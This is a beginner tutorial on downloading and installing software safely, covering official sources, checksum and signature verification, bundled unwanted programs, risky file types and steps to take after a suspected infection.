Back to Tutorials
INTERNET BASICS

Safe File Downloads and Software Installation

18 min read Beginner

Downloading files and installing software is something we do regularly, yet it remains one of the most common ways people accidentally introduce malware, adware, or unwanted programs onto their computers. In this tutorial, you will learn how to identify trustworthy download sources, verify file integrity, avoid bundled junk software, and follow safe installation practices that will keep your system clean and secure.

Official Sources vs. Third-Party Download Sites

The single most important rule for safe downloads is: always download software from official sources whenever possible. This means getting the software directly from the developer's website or from the official app store for your platform.

What Counts as an Official Source?

  • The developer's website -- For example, downloading Firefox from mozilla.org, VLC from videolan.org, or Python from python.org.
  • Official app stores -- Microsoft Store (Windows), Mac App Store (macOS), Google Play Store (Android), or Apple App Store (iOS). These stores review submissions and scan for malware.
  • Official repositories -- For Linux users, your distribution's package manager (apt, yum, pacman) pulls from trusted repositories maintained by the distribution.
  • GitHub/GitLab releases -- For open-source software, the official repository's "Releases" page is a trustworthy source, provided you verify you are on the correct repository.

Why Third-Party Download Sites Are Risky

Third-party download sites like CNET's Download.com, Softonic, FileHippo, and similar aggregators have a troubled history. Many of these sites wrap legitimate software in their own installers that bundle additional programs -- toolbars, browser hijackers, or even adware. Even if the core software is legitimate, the wrapper around it may not be.

Warning: Be extremely cautious of any download site that uses a "Download" button that is actually an advertisement. Many third-party sites place ads that look like download buttons right next to the real download link. Always look carefully before clicking.

Some third-party sources are reputable. For example, ninite.com is a well-regarded service that lets you install multiple common programs at once without any bundled extras. The key is to research a source's reputation before trusting it.

Checking File Signatures and Checksums

Even when downloading from official sources, there is a small chance that the file could have been tampered with -- for example, if the developer's server was compromised. This is where checksums and digital signatures come in.

What Is a Checksum?

A checksum is a unique string of characters generated from a file's contents using a mathematical algorithm. If even a single byte of the file changes, the checksum will be completely different. Many software developers publish the checksum alongside their downloads so you can verify the file you downloaded matches exactly what they intended to distribute.

Common checksum types include MD5, SHA-1, and SHA-256. SHA-256 is the most secure and most commonly used today.

How to Verify a Checksum

On Windows, open PowerShell and run:

Get-FileHash C:\Users\YourName\Downloads\setup.exe -Algorithm SHA256

On macOS or Linux, open Terminal and run:

sha256sum ~/Downloads/setup.tar.gz        # Linux
shasum -a 256 ~/Downloads/setup.dmg        # macOS

Compare the output with the checksum published on the developer's download page. They should match exactly. If they do not, do not install the file -- delete it and download again from the official source.

Tip: You do not need to compare the entire checksum character by character. Check the first 8 characters and the last 8 characters. If those match, the entire checksum almost certainly matches. But for critical software (operating systems, encryption tools), compare the full string.

Digital Signatures

Digital signatures go a step further than checksums. They use cryptographic certificates to prove both that the file has not been modified and that it was genuinely created by the claimed developer. On Windows, you can check a file's digital signature by right-clicking the file, selecting "Properties," then clicking the "Digital Signatures" tab. If the signature is valid and from the expected publisher, the file is authentic.

Browser Download Safety Features

Modern web browsers include several built-in safety features for downloads. Understanding these features helps you make informed decisions about the files you download.

Safe Browsing Warnings

Google Chrome, Mozilla Firefox, and Microsoft Edge all use safe browsing databases that check downloaded files against lists of known malware. If you see a warning that a file is dangerous, take it seriously. While false positives occasionally occur, it is much safer to heed the warning and investigate further before proceeding.

Uncommon Download Warnings

You may also see warnings saying a file "is not commonly downloaded" or "may be dangerous." This does not necessarily mean the file is malicious -- it could simply be rare or new software. However, it does mean the file has not been widely verified by other users. Proceed with extra caution: verify the source, check the checksum if available, and scan the file with antivirus software before opening.

Automatic Scanning

Most browsers automatically scan downloaded files using your system's built-in antivirus (like Windows Defender on Windows). Let this scan complete before opening the file. If the scan finds something suspicious, quarantine or delete the file immediately.

Recognizing Bundled Malware and Unwanted Software

One of the most common threats when installing software is not outright malware but rather Potentially Unwanted Programs (PUPs). These are programs that sneak into the installation process of legitimate software and install themselves alongside it. They include browser toolbars, search engine hijackers, system "optimization" tools, and adware.

Red Flags During Installation

  • Pre-checked boxes -- Watch for checkboxes that are already checked, offering to install additional software, change your homepage, or set a new default search engine. Always uncheck these.
  • "Express" or "Recommended" installation -- These options often include bundled software. Always choose "Custom," "Advanced," or "Manual" installation when available, even if the installer says the recommended option is for "most users."
  • Decline/Skip buttons in unusual places -- Some installers present bundled offers in a way that makes the "Accept" button prominent and the "Decline" or "Skip" option small or hidden. Read every screen carefully.
  • Offers that look like required steps -- Some installers present bundled software as if it is part of the installation process. It is not. If a screen is offering you something new to install, you can always decline.
Warning: Free software that is ad-supported or funded through bundled offers is not always bad, but it requires you to pay close attention during installation. If a program bundles too many offers or makes them hard to decline, consider finding an alternative.

Safe Installation Practices

Follow these steps every time you install new software to minimize risk:

1. Research Before You Download

Before downloading any software, spend a minute searching for reviews and information about it. Search for the software name along with words like "review," "safe," or "malware." If multiple sources warn about the software, find an alternative.

2. Download from Official Sources Only

As discussed above, always prefer the developer's official website or your platform's app store. If you find software recommended on a blog or forum, go to the official website to download it rather than using the link provided.

3. Scan the File Before Running It

Before running any downloaded installer, scan it with your antivirus software. On Windows, you can right-click the file and select "Scan with Microsoft Defender" (or whatever antivirus you use). For extra assurance, you can upload the file to virustotal.com, which scans files against dozens of antivirus engines simultaneously.

Tip: VirusTotal (virustotal.com) is a free service by Google that scans files and URLs against 70+ antivirus engines. It is one of the most useful tools for verifying that a file is safe. You can upload files up to 650MB and get results in seconds.

4. Always Choose Custom Installation

When the installer gives you the choice between "Express/Quick" and "Custom/Advanced," always choose Custom. This lets you see exactly what will be installed and decline any extras. Read each screen of the installer carefully rather than clicking "Next" as fast as possible.

5. Check Permissions on Mobile

When installing apps on your phone, review the permissions the app requests. A flashlight app that asks for access to your contacts, camera, and location is requesting far more access than it needs, which is a significant red flag. Both Android and iOS allow you to review and revoke permissions after installation in your device settings.

6. Keep Software Updated

Once software is installed, keep it updated. Updates frequently include security patches that fix vulnerabilities discovered since the previous version. Enable automatic updates when possible, or check for updates regularly.

Dangerous File Types to Watch For

Not all file types carry the same risk. Here are the types that can execute code on your system and therefore pose the greatest threat:

High Risk (can execute code):
  .exe    - Windows executable
  .msi    - Windows installer package
  .bat    - Windows batch script
  .cmd    - Windows command script
  .ps1    - PowerShell script
  .vbs    - Visual Basic script
  .js     - JavaScript file (when run outside a browser)
  .jar    - Java application
  .scr    - Screensaver file (actually an executable)
  .dmg    - macOS disk image
  .app    - macOS application
  .sh     - Linux/macOS shell script
  .deb    - Linux Debian package
  .rpm    - Linux Red Hat package
  .apk    - Android app package

Medium Risk (can contain macros or exploits):
  .doc/.docm  - Word documents with macros
  .xls/.xlsm  - Excel spreadsheets with macros
  .pdf         - PDF files (rare, but can contain exploits)
  .zip/.rar    - Archives (can contain any of the above)
Warning: Be especially wary of email attachments with these file types. If you receive an unexpected file from someone -- even someone you know -- verify with them before opening it. Their account may have been compromised and used to send malicious files.

What to Do If You Think You Are Infected

If you suspect your computer has been infected by something you downloaded, do not panic. Here is a step-by-step plan:

  1. Disconnect from the internet -- This prevents malware from communicating with external servers, spreading to other devices on your network, or downloading additional malicious components.
  2. Do NOT enter any passwords -- Until you have resolved the infection, avoid logging in to any accounts on the affected device. If the malware includes a keylogger, your credentials could be captured.
  3. Run a full antivirus scan -- Use your installed antivirus software to run a complete system scan (not a quick scan). If you do not have antivirus software installed, you can download free tools like Malwarebytes from a clean computer and transfer them via USB drive.
  4. Boot into Safe Mode -- If the malware prevents your antivirus from running normally, restart your computer in Safe Mode (on Windows: hold Shift while clicking Restart, then navigate to Troubleshoot > Advanced Options > Startup Settings). Safe Mode loads only essential system files, which often prevents malware from running.
  5. Remove suspicious programs -- Open your system's program manager (Add or Remove Programs on Windows, Applications folder on macOS) and look for any programs you do not recognize or that were installed around the time the problems started. Uninstall them.
  6. Change your passwords -- After cleaning the infection, change your passwords for important accounts (email, banking, social media) from a different, clean device. Enable two-factor authentication if you have not already.
  7. Update everything -- Make sure your operating system, browser, and all software are up to date. The vulnerability that allowed the infection may have been patched in a recent update.
  8. Consider a fresh start -- If the infection is severe or you cannot be certain it is fully removed, backing up your important files and performing a clean reinstall of your operating system is the most thorough solution.
Tip: Prevention is always easier than cleanup. Maintain regular backups of your important files so that even in a worst-case scenario, you will not lose your data. Use an external hard drive, a cloud backup service, or both.

Key Takeaways

  • Always download software from official sources -- the developer's website or your platform's app store.
  • Verify downloaded files using checksums (SHA-256) when available, and check digital signatures on executable files.
  • Pay attention to your browser's download warnings and let antivirus scans complete before opening files.
  • Always choose Custom/Advanced installation and carefully decline bundled offers.
  • Be cautious with high-risk file types, especially those received via email.
  • If you suspect infection, disconnect from the internet, run a full scan, and change your passwords from a clean device.
  • Keep all software updated and maintain regular backups of your important data.

Downloading and installing software safely is not difficult, but it does require attention and good habits. By following the practices outlined in this tutorial, you will dramatically reduce your risk of encountering malware or unwanted software. Stay vigilant, stay updated, and when in doubt, do not click.

Previous: Web Searching All Tutorials